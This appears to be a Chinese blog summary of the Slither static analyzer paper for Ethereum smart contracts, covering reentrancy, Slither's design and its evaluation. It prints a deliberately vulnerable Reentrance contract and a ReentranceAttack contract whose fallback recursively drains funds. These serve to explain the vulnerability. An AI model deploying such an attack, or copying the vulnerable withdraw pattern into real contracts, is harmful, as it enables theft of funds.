Slither: A Static Analysis Framework For Smart
Slither: A Static Analysis Framework For Smart
論文標題:Slither:智慧的靜態分析框架;
補充閱讀:Slither: The Leading Static Analyzer for Smart Contracts
工具開源:Slither, the Solidity source analyzer,也是以太坊官方推薦的另一款靜態智慧合約分析工具之一。
論文引用:Feist J, Grieco G, Groce A. Slither: a static analysis framework for smart contracts[C]//2019 IEEE/ACM 2nd International Workshop on Emerging Trends in Software Engineering for Blockchain (WETSEB). IEEE, 2019: 8-15.
一、主要內容
可重入攻擊介紹
可重入攻擊也就是攻擊方傳送一筆交易,導致合約一致重複執行直到將合約賬戶的資源消耗完。攻擊方能成功進行可重入攻擊,主要依賴於Soildity為智慧合約提供的fallback和call函式,下面先對這兩個函式的功能進行介紹。
Fallback 函式
以太坊的智慧合約,可以宣告一個匿名函式(unnamed function),叫做 Fallback 函式,這個函式不帶任何引數,也沒有返回值。當向這個合約傳送訊息時,如果沒有找到匹配的函式就會呼叫 fallback 函式。比如向合約轉賬,但要合約接收 Ether,那麼 fallback 函式必須宣告為 payable,否則試圖向此合約轉 ETH 將失敗。如下:
function() payable public { // payable 關鍵字,表明呼叫此函式,可向合約轉 Ether。
}
向合約傳送 send、transfer、call 訊息時候都會呼叫 fallback 函式,不同的是 send 和 transfer 有 2300 gas 的限制,也就是傳遞給 fallback 的只有 2300 gas,這個 gas 只能用於記錄日誌,因為其他操作都將超過 2300 gas。但 call 則會把剩餘的所有 gas 都給 fallback 函式,這有可能導致迴圈呼叫。
Call函式
call 可導致可重入攻擊,當向合約轉賬的時候,會呼叫 fallback 函式,帶有漏洞的合約程式碼如下:
- withdraw函式的msg.sender.call.value可能成為惡意程式碼攻擊的地方。
- 如果發起交易方也是智慧合約賬戶,當攻擊方的合約賬戶通過呼叫Reentrance合約的withdraw函式進行提現的時候,由於呼叫call函式,將會呼叫攻擊方合約的fallback函式;如果fallback程式碼再次呼叫Reentrance合約的withdraw函式就會形成程式碼可重入,將Reentrance合約賬戶的金額全部提走而在區塊的記錄僅僅提現了第一筆
contract Reentrance {
mapping(address => uint) public balances;
// 充值
function donate(address _to) public payable {
balances[_to] += msg.value;
}
// 檢視餘額
function balanceOf(address _who) public view returns (uint balance) {
return balances[_who];
}
// 提現
function withdraw(uint _amount) public {
if(balances[msg.sender] >= _amount) {
if(msg.sender.call.value(_amount)()) { //造成可重入攻擊的程式碼
_amount;
}
balances[msg.sender] -= _amount;
}
}
function() public payable {}
}
攻擊方的合約程式碼如下:
contract ReentranceAttack{
Reentrance entrance;
function ReentranceAttack(address _target) public payable {
entrance = Reentrance(_target);
}
function deposit() public payable{
entrance.donate.value(msg.value);
}
function attack() public{
entrance.withdraw(0.5 ether);
entrance.withdraw(0.5 ether);
}
function() public payable{
//攻擊方將會遞迴進行提幣操作
entrance.withdraw(0.5 ether);
}
function withdraw() public {
msg.sender.transfer(this.balance);
}
}
二、設計實現
基本功能
Slither是一個用Python 3編寫的智慧合約靜態分析框架,提供如下功能:
- 自動化漏洞檢測(Automated vulnerability detection)。提供超30多項的漏洞檢查模型,模型列表詳見:https://github.com/crytic/slither#detectors。
- 自動優化檢測(Automated optimization detection)。Slither可以檢測編譯器遺漏的程式碼優化項並給出優化建議。
- 程式碼理解(Code understanding)。Slither能夠繪製合約的繼承拓撲圖,合約方法呼叫關係圖等,幫助開發者理解程式碼。
- 輔助程式碼審查(Assisted code review)。使用者可以通過API與Slither進行互動。
工作方式
Slither的工作方式如下:
- Solidity compiler:智慧合約原始碼經過solc編譯後得到Solidity抽象語法樹(Solidity Abstract Syntax Tree,AST)作為Slither的輸入;可以指定Slither去呼叫一些常見的框架(包括Truffle,Embark和Dapp)去分析一份智慧合約。
- information recovery(資料整合):Slither會生成一些重要的資訊,比如合約的繼承圖(inheritance graph)、控制流圖(CFG)以及合約中函式列表。
- SlithIR conversion:Slither將合約程式碼轉換為SlithIR(一種內部表示語言),目的是通過簡單的API實現高精度分析,支援汙點和值的跟蹤,從而支援檢測複雜的模型。
- 在程式碼分析階段,Slither執行一組預定義的分析,包括合約中變數、函式的依賴關係;變數的讀寫和函式的許可權控制。
- 經過Slither的核心處理之後,就可以提供漏洞檢測、程式碼優化檢測和程式碼理解輸出等。
三、實驗評估
本文的一個重要部分是將Slither與其他智慧合約靜態分析工具進行比較,我們將Slither(版本0.5.0)與其他開源靜態分析工具進行對比,以檢測以太坊智慧合約中的漏洞,對比的物件有:Securify(版本37e2984),SmartCheck(版本4d3367a)和Solhint(版本1.1.10)。我們決定以檢測可重入漏洞作為評估檢測好壞的標準,因為可重入漏洞是最古老,最易理解和最危險的安全問題之一。
它在第一個月籌集了超過1.5億美元的資金。2016年6月17日,黑客從該組織的“重入性”漏洞中抽走了5000萬美元。從以太經典(ETC)到以太幣(ETH)的硬叉導致瞭解決這次黑客攻擊所產生問題的所有努力。圖2顯示了一個簡單的可重入合約的經典示例,該合約可被人利用以抽取其所有以太幣。
可重入檢測器(The reentrancy detecto)是我們評估的所有工具中可用的少數幾個之一。此外,我們嘗試了Etherscan提供其原始碼的一千個最常用的合同(交易數量最大的那些合同),以獲得以下結果:
四、總結
Slither自從被開發出來,技術迭代速度很快。截止到目前(2020.10.22),開發者最近釋出了Slither0.6.13版,對其做了一些技術改進並新增了一些功能。目前Slither已經擁有96多個開源探測器,包含兩個YUL特定檢測器,適用於競態條件、弱加密和其他關鍵漏洞的檢測。相比於其他用於出於科研目的、論文一經發表就不再維護而言的工具而言,Slither有更好健壯性。
相關文章
- [論文解讀]A Quantitative Analysis Framework for Recurrent Neural NetworkFramework
- SMART goals - SMART objectivesGoObject
- RISK ANALYSIS
- Flutter Analysis OptionsFlutter
- HanLP Analysis for ElasticsearchHanLPElasticsearch
- static
- Smart Industry Operations
- An Analysis of Sequential Recommendation Datasets
- A Security Analysis Of Browser Extensions
- Web Scraping & Data AnalysisWebAPI
- Statistics and Data Analysis for BioinformaticsORM
- pytorch contributing - matmul analysisPyTorch
- The phenomenon of smart contract honeypots
- static用法
- java中的Static、final、Static final各種用法Java
- MSE 609 Quantitative Data Analysis
- Elasticsearch Analysis 分析器Elasticsearch
- 重構smart-importImport
- Smart Value Help 總結
- static的作用
- C#staticC#
- Interface中加Static
- php static dynamicPHP
- Oracle Respones-Time Analysis ReportsOracle
- Fishing for Hackers: Analysis of a Linux Server AttackLinuxServer
- Exercise 5: Field data acquisition and analysisUI
- ECON705 Housing Affordability Analysis
- Problems in Mathematical Analysis (American First Edition)
- Analysis of Set Union Algorithms 題解Go
- SAP QM Certificate of Analysis – Incoming Certificate
- SMART Utility for mac (硬碟檢測)Mac硬碟
- Cell smart table scan等待事件事件
- static/final/常量模式模式
- oop_promax_staticOOP
- extern和static使用
- static關鍵字
- inline、const、mutable、this、staticinline
- PHP中的staticPHP